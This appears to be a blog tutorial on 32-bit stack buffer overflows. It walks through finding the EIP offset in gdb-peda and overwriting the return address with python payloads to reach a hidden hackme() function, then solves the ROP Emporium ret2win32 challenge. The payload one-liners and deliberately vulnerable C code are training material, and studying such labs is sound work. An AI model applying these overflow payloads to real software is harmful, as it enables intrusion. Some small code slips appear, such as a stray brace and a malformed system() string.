Getting Started #
A buffer overflow occurs when a program writes more data to a buffer (a contiguous block of memory) than it can hold, leading to adjacent memory locations being overwritten. In this blog, we will start with an introduction to stack-based buffer overflows and explore a technique called ret2win
Now for example, this is a secure program that we can’t break:
#include <stdio.h>
#include <unistd.h>
int secure(){
char buffer[200];
int input;
input = read(0, buffer, 200); //matches the buffer size
printf("\n[+] user supplies: %d-bytes!", input);
printf("\n[+] buffer content --> %s!", buffer);
return 0;
}
int main(int argc, char * argv[]){
secure();
return 0;
}
gcc -m32 secure.c -o notvulnerable
It doesn’t matter how many characters we pass, only 200 bytes are read. This is because the read function takes only 200 bytes as input.
Now this is an example program susceptible to buffer overflow:
#include <stdio.h>
#include <unistd.h>
int overflow(){
char buffer[200];
int input;
input = read(0, buffer, 400); //doesn't match the buffer size
printf("\n[+] user supplies: %d-bytes!", input);
printf("\n[+] buffer content --> %s!", buffer);
return 0;
}
int main(int argc, char * argv[]){
overflow();
return 0;
}
}
Let’s compile it in 32 bit for simplicity and without buffer-overflow protection for demonstration purposes:
gcc -m32 -fno-stack-protector -no-pie -o vulnerable Overflow.c
Here’s what each flag does:
-m32
: Compile the code for a 32-bit architecture.-fno-stack-protector
: Disable stack protection mechanisms that help prevent buffer overflows.-no-pie
: Compile the code without Position Independent Executable (PIE) support, meaning the code’s memory addresses will be fixed.
Now we can see in gdb, it should not be stripped to see the function names easily. Stripping removes symbol tables which includes function names and variable names, this is usually done for production binaries but developers keep an unstripped binary for debugging purposes. To check file properties:
file vulnerable
Understanding the Basics #
We will use gdb-peda, install it from here
Let’s start gdb with our vulnerable binary and list the functions:
gdb -q ./vulnerable
info functions
We can see all the functions in the binary.
Let’s try disassembling main function as an example:
disas main
Let’s breakdown what we see, there are the memory addresses and ofcourse the registers and instructions.
Registers are small storage locations in the CPU that hold data, addresses, or control information for quick access during execution. Instructions are commands that the CPU executes, specifying operations to perform on data stored in registers or memory. Don’t confuse between Instructions and Registers, here are a few examples
- Registers
- EIP: Points to the next instruction.
- ESP: Points to the top of the stack.
- EBP: Points to the base of the current stack frame.
- Instructions
ret
: Returns control to the calling function.call
: Calls a function, saving the return address.jmp
: Unconditionally jumps to a specified address
EIP or the Instruction pointer holds the address of what’s about to be executed.
When we perform BOF, return address is overwritten which means the program can’t return to itself to finish what it started. If the return address is altered, when the function attempts to return (using the ret
instruction), it will jump to the new address instead of the intended one.
The call instruction places the return address at the top of the stack.
The return address is placed on the stack when a function is called, waiting to be used for restoring the execution flow. When the function completes and executes the ret
instruction, it takes the value from the top of the stack (pointed to by the ESP register) and loads it into the EIP register. This action restores the execution flow to the original program, allowing it to resume from where the function was called. Thus, the function successfully exits and control returns to the calling code.
It’s alright if you didn’t understand all that, once we get going you will slowly get all this into your brain.
Exploiting #
This is the general outline we will follow (This is assuming that there are no defence mechanisms in place.)
- Segfault/Crash : Crash or overflow the program
- Eip-offset: Find out how many bytes it took to crash the programn
- Eip-overwrite: Confirm the offset with the legendary “B test”
- Shellcode/ret2-based attacks: Shellcode if NX/DEP absent or use ret2* if it is present
- Pwned:
<insert happy hacker noises>
Now that I’ve explained the basics think what would happen if we overflow the buffer just enough to get to the EIP and pass in our own malicious address. That’s right! We can execute whatever we want then.
Now let’s go through the steps.
Crashing #
Now let’s try to crash the program. Let’s use an obscenely large number of characters:
python -c 'print("A"*500)' | ./vulnerable
Yup it crashed. Onto the next step!
Eip-offset #
How many bytes does it take to crash it? There are two techniques to find out
- Increase number of bytes until it crashes
- Better approach is to create a pattern and find out which part of the pattern is in the EIP to get the offset
To detect overflow into EIP we will use cyclical patterns.We can use inbuilt pattern command in gdb-peda.
pattern create 600
Now for our vulnerable program we know we need 400 bytes (only because we have the source code):
pattern create 400 pattern.txt
Now let’s pass in the pattern into the program, we set a signal to break upon segmentation error:
gdb ./vulnerable
catch signal SIGSEGV
r < pattern.txt
We see what’s in the EIP so now we can check the offset:
pattern offset 0x4325416e
The offset is at 216 bytes.
Eip-overwrite #
We need to check if we can write into the EIP so basically this is what we are going to do:
So now that we found that the offset is 216 let’s pass in 216 A’s and 4 B’s (4 B’s because the address is 4 bytes (32 bits))
python -c 'print("A"*216 + "BBBB")' > EIP_offset.txt
We can see if we get the hex for B.
gdb -q ./vulnerable
catch signal SIGSEGV
r < EIP_offset.txt
We can see that BBBB is in EIP:
Shellcode/ret2*-based attacks #
To check security measures:
pwn checksec ./vulnerable
We can’t use shellcode attack here because the stack is not executable due to the NX bit: We will use ret2 based attacks, for this we need a function that we can leverage inside the binary. So let’s create one (you obviously can’t do this with binaries for which you don’t have the source code so use an already existing function).
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int hackme()
{
system("touch hacked.txt && -la");
}
int overflow(){
char buffer[200];
int input;
input = read(0, buffer, 400); //doesn't match the buffer size
printf("\n[+] user supplies: %d-bytes!", input);
printf("\n[+] buffer content --> %s!", buffer);
return 0;
}
int main(int argc, char * argv[]){
overflow();
return 0;
}
In this program, the hackme
function is never called under normal circumstances, which means it cannot be executed. However, by exploiting BOF in the binary, we can “hack” it and force the execution of the hackme
function. This demonstrates how we can manipulate the program’s control flow to run code that is otherwise inaccessible.
Now we can find the address for the hackme function:
gdb -q ./vulnerable
info functions
We have the address for the hackme function. We can alse get it by using:
p hackme
Disassembling hackme function:
disas hackme
There is a call to a system function and above it is push. When you see a function call with an address being pushed above it, the address is likely an argument for the function (system()
in this case).
The address 0x8049060
points to the Procedure Linkage Table (PLT) entry for the system
function here.
Examining the address being pushed:
- Big Endian: evil_function = 0xdeadbeef
- Little Endian: evil_function = 0xefbeadde
This is going to be in little-endian as it is for the x86 architecture . Basically we need to use addresses in reverse order or least significant byte first.
Pwned #
We need a payload and it should be like payload = offset+ hackme_addr
offset: 216 bytes as we discovered
hackme_addr: modifying 0x08049186
for little-endian: 0x86910408
So using python to generate a payload. Python2 is slightly easier due to how it handles hexadecimals.
python2 -c 'print("A" * 216 + "\x86\x91\x04\x08")' | ./vulnerable
python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 216 + b"\x86\x91\x04\x08")' | ./vulnerable
We have executed the hackme() function. If you remember the function was never called in the main function. We have successfully hacked the program.
Capstone Exercise #
We will solve a challenge from https://ropemporium.com/ called ret2win, we will solve the x86 version but the x86_64 version is also solved similarly. We don’t have the source code in this case.
Unzip it and you’ll have the ret2win32 binary. Let’s check the security measures
pwn checksec ./ret2win32
We have NX enabled so we can’t use shellcode.
To print sequences of printable characters in this binary files:
strings ret2win32
Or use this for a better output:
rabin2 -z vulnerable
rabin2 is part of radare2.c
Okayyyyyyy let’s execute it:
./ret2win32
Now let’s try to overflow it:
python3 -c 'print("A"*100)' | ./ret2win32
Let’s check dmesg. We could also use GDB but this is quicker.
sudo dmesg
So 41414141 is:
echo '\x41' | xxd
It is A
So we can overflow it.
Let’s just add catch signal SIGSEGV
to our config at ~/.gdbinit
as it gets annoying typing it everytime:
set debuginfod enabled on
source ~/.peda/peda.py
catch signal SIGSEGV
Start gdb and let’s find the offset.
gdb -q ./ret2win32
pattern create 100 pattern.txt
r < pattern.txt
Now finding the offset:
pattern offset 0x41414641
So 44 is the offset.
Let’s check with the “B test”:
python3 -c 'print("A"*44 + "BBBB")' | ./ret2win32
Now check logs:
sudo dmesg
0x42424242
is BBBB so it worked.
Now we can use ret2 method as we cannot use shellcode due to NX being enabled.
We’ll find some function to return to. We have a pwnme function.
Disassembling it:
disas pwnme
We see a lot of put functions so this might be the function outputting what we saw earlier when the program ran. Confirmed by examining the addresses being pushed:
Let’s try disassembling the ret2win function:
disas ret2win
Let’s examine the push above the system function:
x/s 0x8048813
Little-endian-ing the address and passing it in after the offset:
python2 -c 'print("A"*44 + "\x2c\x86\x04\x08")' | ./ret2win32
And there we have it, we have successfully hacked it.
Stay tuned for more content on Reverse Engineering, thank you for reading!